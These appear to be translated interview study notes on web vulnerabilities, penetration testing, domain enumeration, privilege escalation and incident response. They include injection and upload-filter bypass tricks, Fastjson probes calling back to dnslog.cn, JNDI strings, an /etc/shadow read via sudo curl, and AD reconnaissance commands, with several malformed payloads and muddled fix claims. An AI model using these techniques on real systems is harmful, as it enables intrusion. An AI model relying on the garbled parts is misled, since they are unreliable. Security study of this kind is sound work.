Table of contents
SQL Injection Fix Recommendations
SQL injection vulnerability mining
Principle of file upload vulnerability
File Upload Vulnerability Repair Suggestions
File contains vulnerability principle
The file contains four PHP related functions
! ! ! The difference between XSS and CSRF and SSRF vulnerabilities
CSRF (Cross Site Request Forgery)
SSRF vulnerability (server request forgery)
SSRF Vulnerability Repair Suggestions
XXE vulnerability (XML document external entity injection)
XXE Vulnerability Repair Suggestions
Deserialization Vulnerabilities
Deserialization Vulnerability Principle
Deserialization Vulnerability Fix Recommendations
Shiro deserialization vulnerability
Fastjson deserialization vulnerability
Log4j2 lookup function JNDI injection
Middleware Tomcat, Jboss, weblogic with deserialization vulnerabilities
Windows privilege escalation method
3. View detailed information of domain users
4. Query domain list (if there are multiple domains)
5. View host information in the domain
6. Obtain the host name under the specified domain
7. View computers in the domain
8. View domain trust relationship
9. Query domain password information
10. View the time in the domain (time server)
11. View the list of user groups in the domain
13. How to find the controller in the domain
14. View domain administrators group
Traffic alarm handling for web attacks
How to judge if a SQL injection warning is found?
The six processes of emergency response?
How to deal with the emergency if you get a virus (or a mining virus) or a Trojan horse?
The difference between /etc/passwd and /etc/shadow
Intrusion troubleshooting ideas
Linux system troubleshooting ideas
Penetration testing process
After getting the authorization and communicating with the customer , get the asset or target domain name provided by the customer;
Information collection : Mainly use tools such as nmap, Yujian, fofa, etc. to collect relevant information such as ports, IPs on the same network segment, subdomain names, related services, frameworks, middleware used, various version information, and historical vulnerability information. After obtaining the information, you can retrieve the relevant vulnerabilities, and then manually verify
Vulnerability scanning : According to the collected information, use tools such as missing scanning to perform automatic detection such as scanning and blasting, and perform vulnerability verification according to the scanning results
Manual vulnerability mining : manual vulnerability verification and manual vulnerability mining
Manually verify the collected framework vulnerabilities and component vulnerabilities;
Then use tools such as burpsuite for vulnerability mining for main function points, such as login page, file upload page, information query page, password reset page, etc.
Privilege escalation : After the customer's permission, further escalate the privilege or intranet penetration of the vulnerability point that has obtained the shell authority
Trace removal : Clean up Trojan horses, account numbers, etc. left during the infiltration process
Report writing : Write a vulnerability report based on the detected vulnerabilities and suggestions for repairing the vulnerabilities
Vulnerability retest : After the customer repair is completed, retest the vulnerability to check whether the vulnerability has been repaired and complete the closed loop
common port
21 FTP
22 SSH
80 HTTP
443 HTTPS
445 ms17010 exploit port
3389 Remote Desktop
3306 MySQL database
1433 SQL server database
1521 orcle database
7001 weblogic middleware management interface
8080 tomcat middleware management interface
6379 redis database
Nmap
nmap hostname/ip or multiple ip or subnet 192.168.123.*
-iL ip.txt scan all ip in ip.txt
-A includes -sV, -O, probe OS information and traceroute. Generally not used, it is an intense scan
-O Probe operating system information
-sV Find host service version number
-sA detects whether the host is using a packet filter or firewall
-sS Half-open scanning , generally not recorded in the log, but root privilege is required.
-sT TCP connect() scan, this method will record a large number of connection requests and error messages in the log of the target host.
-sP ping scan , plus this parameter will use ping scan, only the host survives, nmap will continue to scan, generally it is best not to add, because some hosts will prohibit ping, but actually exist.
-sN TCP empty scan
-F fast scan
-Pn Do not use ping before scanning, it is suitable for firewalls to prohibit ping, which is more useful.
-p specify port/port range
-oN write report to file
-v verbose
-T<0-5> set speed
SQL injection
Principle of SQL injection
The content input by the client is not verified, resulting in the SQL statement being passed into the database and executed , resulting in a vulnerability
SQL Injection Fix Recommendations
Adding waf can effectively alleviate it, and it can be used as a temporary measure. If you want to eradicate it, you need to modify the source code . Generally, you need to strictly filter the input parameters for SQL statements, or use pre-compilation (that is, encapsulate and compile the statements to be queried first, and the parameters entered later will be used as string input)
SQL injection vulnerability mining
SQL injection vulnerabilities generally appear in places where there is data interaction , such as login pages, data query pages, news pages, data addition pages, etc.
SQL injection bypass method
- Use mixed case ;
- Bypassing by using inline comments is to use the /*!12345 statement */
- Use the equivalent replacement method, such as replacing the equal sign with like
- Use hexadecimal encoding to represent strings, bypassing the filtering of library names
sqlmap use
-U USER database user to enumerate
-r Use the file as the content of the data package submitted during injection (can be used in conjunction with the traffic package captured by burpsuite)
--dbms specify database or version
–dbs enumerate database management system databases
--tables enumerate the tables in the database
--columns enumerate the column names in the data table
-D library name The name of the database to be enumerated
-T table name database table to be enumerated
-C column name database column to enumerate
--os-shell write webshell
--dump drag library
--tamper use automation bypass script
Common automation scripts
base64encode.py convert to base64 encoding
charencode.py uses url encoding
chardoubleencode.py double URL encoding
unmagicquotes.py wide byte injection
randomcomments.py splits SQL keywords with /**/
File Upload Vulnerability
Principle of file upload vulnerability
Because the verification of the uploaded file is not perfect, the executable file is uploaded to the server , resulting in a vulnerability.
File Upload Vulnerability Repair Suggestions
You can filter file suffixes with black and white lists on the server side, verify file content, rename file names after uploading, or use microservices to save uploaded files.
File upload bypass method
1. Blacklist
a. Through some special suffixes .php5, .phtml, .asa, .jap, etc.
b. Upload .htacess and click ht
c. Case pHp
d. Add a space before the file extension in the data packet
e. Add before the suffix name.
f. Add::$DATA
g. No circular verification, you can use x.php..similar method
2. Whitelist (generally need to be used together with other vulnerabilities)
a. %00 truncation
b. Picture horse
c. Conditional competition
file contains bug
File contains vulnerability principle
Principle: File inclusion itself is a normal function. If the client can interfere with the included file name, resulting in the inclusion of malicious files, a vulnerability will occur
The file contains four PHP related functions
1.include(): Use this function, the file will be included only when the code executes to this function, and only warn and continue to execute when an error occurs.
2.inclue_once(): The function is the same as the former, the difference is that when the same file is called repeatedly, the program is called only once.
3.require(): Use this function, as long as the program is executed, call this function immediately to include the file. When an error occurs, an error message will be output and the program will be terminated immediately.
4.require_once(): The function is the same as the former, the difference is that when the same file is called repeatedly, the program is called only once.
The file contains the exploit
1. Read sensitive files file:// pseudo-protocol
2. Remote include shell
3. Upload the image and include the image shell
4. Use the pseudo-protocol php://input to read the data passed by the post, and then execute it as PHP code
5. Include the log file GetShell
6. Truncate contains bypass
File contains suggested fixes
repair:
- Set the PHP parameter allow_url_include=off allow_url_fopen=off
- Strict validation of paths to include
XSS (Cross Site Scripting)
XSS principle
Principle: The Chinese name is a cross-site scripting attack , by inserting malicious scripts (generally
We use js code) to realize the attack on the user's browser
The biggest feature of XSS is that it can inject malicious HTML/JavaScript codes into the webpages browsed by users. It is generated because WEB applications do not filter user input strictly . Since HTML codes and client-side JavaScript scripts can be executed arbitrarily in the browser on the victim's host, this is equivalent to completely controlling the logic of the WEB client. On this basis, hackers can easily initiate cookie stealing, session hijacking, phishing, etc. Various attacks.
XSS fix suggestion
- Filter the input content, such as filtering out the <> parameter
- HTML encode the content that will be output
- Set the httpOnly parameter for important cookies to prevent the client from reading cookies through document.cookie
! ! ! The difference between XSS and CSRF and SSRF vulnerabilities
XSS is a cross-site scripting attack . The target of the attack is the client. Because it is a script attack, the client will do what the JS script writes. For example, stealing cookies is more flexible.
CSRF is a cross-site request forgery , and the target of the attack is also the client. When exploiting, it can only steal cookies , and can only use the function points with csrf vulnerabilities. The limitation is greater than XSS
SSRF is a server-side request forgery , which attacks the server and is more harmful. It can cause intranet penetration, command execution, and intranet information leakage
CSRF (Cross Site Request Forgery)
Principle of CSRF
Principle: Chinese name cross-site request forgery . When the user remains logged in, the attacker constructs a site to induce the user to visit. After the user visits, the malicious site controls the user to jump to a page with a CSRF vulnerability. If the page is a password modification In this process, the cookie that keeps the login status will be stolen, causing the password to be changed.
CSRF Vulnerability Repair Recommendations
- In important function points , increase the verification of the access source , such as verifying the referer header
- Increase verification code verification, increase token verification
SSRF vulnerability ( server request forgery )
SSRF Vulnerability Principle
Principle: It is a resource reference. If it is not verified, it will lead to a loophole in the intranet that does not allow others to access resources or services that are detected or even attacked.
SSRF Vulnerability Repair Suggestions
repair:
1. The address is whitelisted
2. Domain name identification IP filtering internal IP
3. Verify the returned content and compare whether it is consistent with the expected content
XXE vulnerability ( XML document external entity injection )
XXE vulnerability principle
Principle: Also known as XML external entity injection, due to lax filtering, the vulnerability caused by the parsing of malicious XML documents passed in by users
XXE Vulnerability Repair Suggestions
Repair suggestion:
- Filter the XML data submitted by the user;
- Set PHP parameters to disable external entity writing ;
XXE hazards
When external entities are allowed to be referenced, by constructing malicious content, it can lead to reading arbitrary files, executing system commands, detecting intranet ports, and attacking intranet websites.
XXE trigger point
The point where the xxe vulnerability is triggered is often the location where the xml file can be uploaded, and the uploaded xml file is not filtered, resulting in the upload of malicious xml files
Deserialization Vulnerabilities
Deserialization Vulnerability Principle
Principle: Serialization refers to the process of converting a Java object into a binary file, and deserialization refers to the process of converting this file into a Java object. It is a normal process in itself, but if the converted file is malicious, the converted Objects can also be malicious, which can cause threats such as command execution.
Deserialization Vulnerability Fix Recommendations
Generally, the deserialization vulnerabilities we encounter are basically caused by the use of components or classes with deserialization vulnerabilities. Generally, we can defend against them by patching or upgrading to the latest version.
Shiro deserialization vulnerability
This vulnerability exists in Shiro < 1.2.4 version. When mining, delete the rememberMe parameter in the request packet, and the return packet contains the rememberMe=deleteMe field. Indicates that the shiro component is used, and this vulnerability can be tried.
If the return packet does not have this field, you can add the field: ****rememberMe= in the cookie of the sent data packet, and then check whether there is a keyword in the returned data packet
There are two versions of this vulnerability,
SHIRO-550:
There is no need to provide a secret key, and the default secret key can be used
SHIRO-721 deserialization vulnerability
Blast the secret key first, and then use it further after success
Fastjson deserialization vulnerability
Fastjson provides a deserialization function that allows users to specify any deserialization class name through the value corresponding to the "@type" key when inputting a JSON string, thus causing deserialization vulnerabilities;
Vulnerability mining method: If the HTTP header Accept: application/json appears in the request packet, it is suspected that there is a fastjson component, and an error is reported in the construction. When fastjson appears in the returned packet, it is confirmed that the fastjson component is used, and you can try this vulnerability
This vulnerability exists in multiple versions of Fastjson from 1.2.24 to 1.2.67. If there is no echo version, you can replace the following payloads with the request content one by one, and try which version is the vulnerability
{"@type":"java.net.InetSocketAddress"{"address":,"val":"aaa.dnslog.cn"}}
{"@type":"java.net.Inet4Address","val":"aaa.dnslog.cn"}
{"@type":"java.net.Inet6Address","val":"aaa.dnslog.cn"}
{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL", "val":"http://aaa.dnslog.cn"}}""}
Set[{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}
{ {"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}:0
Log4j2 lookup function JNDI injection
Principle: It is the Apache log function itself. It has a log traversal function. When it encounters ${jndi:// }, it will traverse and execute. The JNDI function can also use ldap or rmi to import class files. We only need to enter the class file Adding malicious code that needs to be executed can cause code injection
Traffic characteristics are ${jndi://ldap:// } ${jndi://rmi:// }
For defense, upgrade the version and set the lookup parameter to yes
middleware vulnerability
parsing loopholes
Apache filename parsing
Parse from the back to the front. If you parse the file a.php.abc, parse abc first. If Apache finds that you don’t know it, it will go forward and parse PHP. Finally, the file will be parsed in PHP.
IIS Parsing Vulnerability
1. Directory analysis : IIS parses from front to back. When parsing a.asp/a.jpg files, it will first find the asp suffix, thinking that the file format is asp, and parsing according to asp
2. File name parsing : IIS parses from front to back. When parsing a.asp;.jpg files, it will first find the asp suffix, thinking that the file format is asp, and parse it in the way of asp
Nginx malformed file name resolution
When parsing the file a.jpg, visit a.jpg/.php. When searching for the file content, .php is not a complete file name, so find the a.jpg file from the back to the front. When confirming the file type, nginx pays attention to the suffix. .php has a complete suffix, so it is parsed according to php, so the a.jpg file will be parsed into php
Middleware Tomcat, Jboss, weblogic with deserialization vulnerabilities
Weblogic Vulnerabilities
It is found that port 7001 exists in weblogic
Unauthorized access, deserialization, ssrf vulnerability, T3 protocol deserialization, etc.
Intranet penetration
Escalation of rights
Windows privilege escalation method
1. Elevate the kernel privilege, use WinSystemHelper to run it, give the appropriate kernel vulnerability number, and try it
2. Database privilege escalation, MySQL UDF privilege escalation, SQLserver use xp_cmdshell privilege escalation
3. App privilege escalation
4. Intermediary hijacking, etc.
Linux privilege escalation
- kernel vulnerability escalation
- The SUID privilege escalation file sets the SUID permission, which will allow the user to run this file as the owner. If the owner of the file is root, it will be executed as root.
- Sudo privilege escalation The sudo command can enable any user to execute commands with root privileges. If this command is abused, it will cause privilege escalation
- Timed task privilege escalation Use crontab to set up a timed task, which will be executed as root by default
- curl privilege escalation sudo curl file:///etc/shadow will access the shadow file that stores the hash values of all user passwords, so as to obtain the passwords of high-privileged users
Intranet Penetration Tool
Mimikatz is mainly used for domain penetration
domain information collection
Collection of basic information in the domain
Golden ticket: Golden ticket, forged TGT, equivalent to obtaining domain control authority
Silver ticket: silver ticket, counterfeit ST, login specific service
1. Obtain domain SID
whoami /all
image.png
The domain SID is mainly used to distinguish different domains, and the domain user SID is used to distinguish different users in the domain, which will be used in the subsequent ticket transfer.
2. Query users in the domain
net user /domain
image.png
By querying the users in the domain, you can know all the user names in the current domain
3. View detailed information of domain users
net user tom /domain
image.png
By viewing the detailed information of domain users, you can get information such as the expiration time of domain user passwords, the group they belong to, and the last login time
4. Query domain list (if there are multiple domains)
net view /domain
image.png
By querying the domain list, we can see that there are currently two domains: C1AY, SUB
5. View host information in the domain
net view
image.png
By querying the host information in the domain, we can see that there are 3 computers in the current domain.
6. Obtain the host name under the specified domain
net view /domain:C1ay
image.png
You can also see that there are 3 hosts in the current domain by querying the host name under the specified domain.
7. View computers in the domain
net group "domain computers" /domain
image.png
By viewing the computers in the domain, we can see that there are a total of 2 computers joining the current domain.
8. View domain trust relationship
nltest /domain_trusts
image.png
By checking the domain trust relationship, you can determine whether there is a forest trust or a parent-child domain trust in the current domain, which will be used in subsequent cross-domain or cross-forest attacks.
9. Query domain password information
net accounts /domain
image.png
By querying the domain password information, we can know how often the current domain user changes the password and what the password policy is, and then we can formulate a password dictionary in a targeted manner to improve efficiency.
10. View the time in the domain (time server)
net time /domain
image.png
By checking the time in the domain (time server), we know the time of the current domain, and we can run some bat files by using scheduled tasks + IPC remote connection, which will be introduced in detail later.
11. View the list of user groups in the domain
net group /domain
image.png
Domain Admins: domain administrators.
Domain Computers: Domain computers.
Domain Controllers: domain controllers.
Domain Guest: Domain guest with low authority.
Domain Users: domain users.
Enterprise Admins: Enterprise system administrator users.
By default, Domain Admins and Enterprise Admins have full control over all domain controllers in the domain.
By looking at the user groups of the domain, we can know what each group does. For example, some large enterprises or groups have special financial groups, information groups, marketing groups...etc., then suppose we want to target In order to infiltrate a certain department, a certain group, or a specific person, it is particularly critical to collect group information.
12. View existing users
dsquery user
image.png
Commonly used dsquery commands are as follows: image.png
13. How to find the controller in the domain
1. Find the domain controller through the nltest command
nltest /dclist:hacker
image.png
You can see that there are two domain controllers in the current domain, one is the primary controller and the other is the secondary domain controller.
2. By querying the time in the domain
net time /domain
image.png
Because the time server is generally a domain controller, we can also obtain the IP address of the domain controller through the ping command:
image.png
3. View domain controller group
net group "Domain Controllers" /domain
image.png
4. Query the primary domain controller
netdom query pdc
image.png
5. nslookup query
nslookup DC1.c1ay.lab
image.png
14. View domain administrators group
net localgroup administrators /domain
Traffic Analysis
wireshark uses
Wireshark simple filtering rules
filter ip:
Filter source ip address: ip.src==1.1.1.1;, destination ip address: ip.dst==1.1.1.1;
Filter port:
Filter port 80: tcp.port==80, source port: tcp.srcport==80, destination port: tcp.dstport==80
Protocol filtering:
Just enter the protocol name directly, such as http protocol http
http pattern filtering:
Filter get/post package http.request.mothod=="GET/POST"
Flow characteristics of Kitchen Knife, Ant Sword, and Ice Scorpion
Kitchen Knife Features
The instruction sent to "chopper horse" is encrypted using base64 , and the two key payloads z1 and z2, the name is variable, and there will be a function eval in the request
Ant Sword Features
The default USER-agent request header is antsword xxx, but it can be bypassed by requesting UA in the /modules/request.js file
The most obvious feature of the traffic is @ini_set("display_errors","0"); this code is basically a code that all WebShell clients link to PHP WebShells.
Ant Sword has another obvious feature after obfuscation and encryption, that is, most of the parameter names are in the form of "_0x......=" (underscores can be replaced), so the parameter names starting with _0x are likely to be malicious traffic
ice scorpion
Looking at the package did not find any characteristics, but it can be found that it is a POST request
1. Application/xhtml+xmlapplication/xmlapplication/signed-exchange in the Accept header is a weak feature (the browser version of the UA header is very old)
2. Feature analysis Content-Type: application/octet-stream This is a strong feature. Consult the information and know that octet-stream means that only binary can be submitted, and only one binary can be submitted. If a file is submitted, only one file can be submitted. , There can only be one receiving parameter in the background, and it can only be a stream (or byte array); rarely used
#Ice Scorpion 2 features:
The value of the default Accept field is very special, and it is the same at each stage. Icescorpion has more than ten built-in UserAgents, and each time you connect to the shell, one will be randomly selected for use. But they are relatively old, r is easy to be detected, but ua header can be modified in burp.
Content-Length: 16, 16 is the characteristic of Ice Scorpion 2 connection
#Ice Scorpion 3 features:
Ice Scorpion 3 cancels the dynamic key acquisition. At present, many waf and other devices have analyzed the traffic characteristics of Ice Scorpion 2, so 3 cancels the dynamic key acquisition; php captures the packet and does not find any characteristics, but it can be found that it is a POST requested
1) Accept header application/xhtml+xmlapplication/xmlapplication/signed-exchange is a weak feature
2) ua head This feature is a weak feature. It can be modified through burp, and the default 16 userAgents built in Ice Scorpion 3.0 are relatively old. Few people use it in real life, so this can also be used as a waf rule feature
Feature analysis of jsp packet capture Content-Type: application/octet-stream This is a strong feature Consult the data to know that octet-stream means that only binary can be submitted, and only one binary can be submitted. If a file is submitted, only one can be submitted There can only be one file and background receiving parameter, and it can only be a stream (or byte array); it is rarely used.
Traffic alarm handling for web attacks
The general method for researching, judging and dealing with different vulnerabilities and degrees of harm is as follows:
First check if it is an attack, if it is, block the IP and port first to prevent the attack from continuing
See if it is successful. If successful, determine the impact and restore it.
If it is a traffic alarm that has been compromised, such as webshell communication (there must have been a webshell upload before), and the source address is an attack on the intranet (this host may have been attacked), you need to trace the source
How to judge if a SQL injection warning is found?
There is a detail on the SkyEye alarm page, you can open the specific traffic package, first check whether the request header and request body contain SQL statements commonly used for SQL injection, such as and 1=1, such as sleep, such as updatexml, etc., if so, indicate yes Attack, and then look at the response. If the response status code is 404, the exploit is not successful. If the response code is 200, look at the content of the response body to see if it contains the expected result of the query. If it contains the expected result, the attack is successful. , For disposal, first apply for banning the IP, then apply to the customer for removal of the relevant services, and then repair the loopholes. If the account is exposed, the password needs to be changed.
emergency
The six processes of emergency response?
Prepare-Detect-Suppress-Eradicate-Recover-Track Summary
How to deal with the emergency if you get a virus (or a mining virus) or a Trojan horse?
It depends on the system, the general steps are similar
If it is Linux:
Quarantine the device first, then log into that host
- First, find out the process ID (PID) according to the port and domain name in the alarm, the command is netstat -ano
If there is no port or communication ip information, you can use the top command to list suspicious processes with a large current cup occupancy rate
- Kill the process according to the PID after locating the file according to the detected port number
Locate the file ls -l /proc/port number, in the result /proc/port number/exe is linked to the execution command file of the process
kill process kill -9 PID number
- After the file is encrypted and saved for evidence collection, delete the file and scan it with anti-virus software to see if there are residual files
- Find a file sandbox (such as Qi Anxin's TI system) and run the extracted virus file to see what behavior it will cause, and repair it according to the behavior
- Check whether there are backdoors such as suspicious users, suspicious files, and ssh login certificates, and check scheduled tasks
- Check how the file was uploaded, most likely it was uploaded by a web vulnerability or ssh blasting
- Write an emergency inspection report
If Windows
1. First, find out the process ID (PID) according to the port and domain name in the alarm. The command is netstat -ano
If there is no port or communication ip information, you can use the task manager to list suspicious processes with a large current CPU usage
2. After locating the file, kill the process according to the PID
Locate the file In the detailed information interface of the task manager, according to the pid, right click to open the file location
Kill the process taskill /t /pid PID number
3. After the file is encrypted and saved for evidence collection, delete the file and scan it with anti-virus software to see if there are residual files
4. Find a file sandbox (such as Qi Anxin's TI system) and run the extracted virus file to see what behavior it will cause, and repair it according to the behavior
5. Check whether there are suspicious users, suspicious files, and backdoors left, check whether there are remnants in the registry, and check whether the system starts automatically
6. Check how the file is uploaded
7. Write emergency inspection report
The difference between /etc/passwd and /etc/shadow
/etc/passwd saves account information and generally does not save passwords
/etc/shadow is mainly used to store passwords
Intrusion troubleshooting ideas
### has been compromised
1. The purpose has been achieved, the Trojan horse and the back door have been destroyed
1. Now that you know it has been invaded, locate the time point of the intrusion
2. If the server is a cloud server, take a snapshot of it. (Purpose, to seal the memory.)
3. When the time point is located, check the device flow information. Find Trojan Link Information
4. Find the corresponding logs in the system and find relevant clues
5. If the log is deleted, because the machine snapshot has been established. Use Winhex to recover hard disk data
2. The purpose is not achieved, and the data is being sent back. Both the Trojan horse and the backdoor run on the server
1. Offline server, ban attack IP
2. Volatility memory forensics, create a snapshot, extract the memory, locate the shellcode and find its IP
3. If they use common C2 tools, we can analyze the intruder's intentions based on the traffic
4. Shut down the server, or ban their IP on the firewall. Log in to the server and remove the shellcode
5. Enter the safe mode after restarting, check the registry plan task service magnifying glass back door shift back door
being hacked
Maybe the intruder goes offline when trying to attack, and then checks the machine
For example: Weak password blasting
1. Weak password blasting will generate logs, and the logs must use a remote log system, such as rsyslog of Linux. The advantage of opening the remote log system: not afraid of the log being deleted by the attacker
2. Be sure to find the source IP of the intruder, and issue a blocking policy to the firewall
Linux system troubleshooting ideas
1. Check whether there are redundant accounts in the user and password files /etc/passwd and /etc/shadow, mainly look at the accounts
Whether it is nologin later, if there is no nologin, pay attention;
2. Use the who command to view the current login user (tty local login pts remote login), w command to view the system
Information, want to know the behavior of users at a certain moment, uptime to check how long they have logged in, how many users, and load;
3. Modify the /etc/profile file, and add corresponding display time, date, ip, and command script codes at the end, so that entering the history command will display the attacker's ip, time history commands, etc. in detail;
4. Use the netstat -antlp|more command to analyze suspicious ports, IPs, and PIDs, check the process file path corresponding to the pid, and run ls -l /proc/$PID/exe or file /proc/$PID/exe ($PID is the corresponding pid number);
5. Use the ps command to analyze the process ps aux | grep pid
6. Use vi /etc/inittab to check the current running level of the system, and find out whether there are suspicious files in the directory corresponding to /etc/rc.d/rc[0~6].d through the running level;
7. Check whether crontab timing tasks have suspicious activation scripts;
8. Use chkconfig --list to check whether there are suspicious services;
9. Use the grep awk command to analyze whether there are any traces of attack in the /var/log/secure security log;
10. chkrootkit, rkhunter, and Clamav virus backdoor scanning and killing tools can check and kill Linux system files;
11. If there is a website, you can use D-Shield, Hippo killing tool to kill or manually check the code according to the script Trojan keyword, key function (evel, system, shell_ex
Webshell lookup
Use d-shield in Windows environment
Linux environment uses Hippo Linux
The difference between Cookie and Session
The cookie is stored on the machine, and the session is stored on the server
Both Cookie and Session are mechanisms for tracking user authentication and status, but Cookie stores data on the client side, while Session stores data on the server side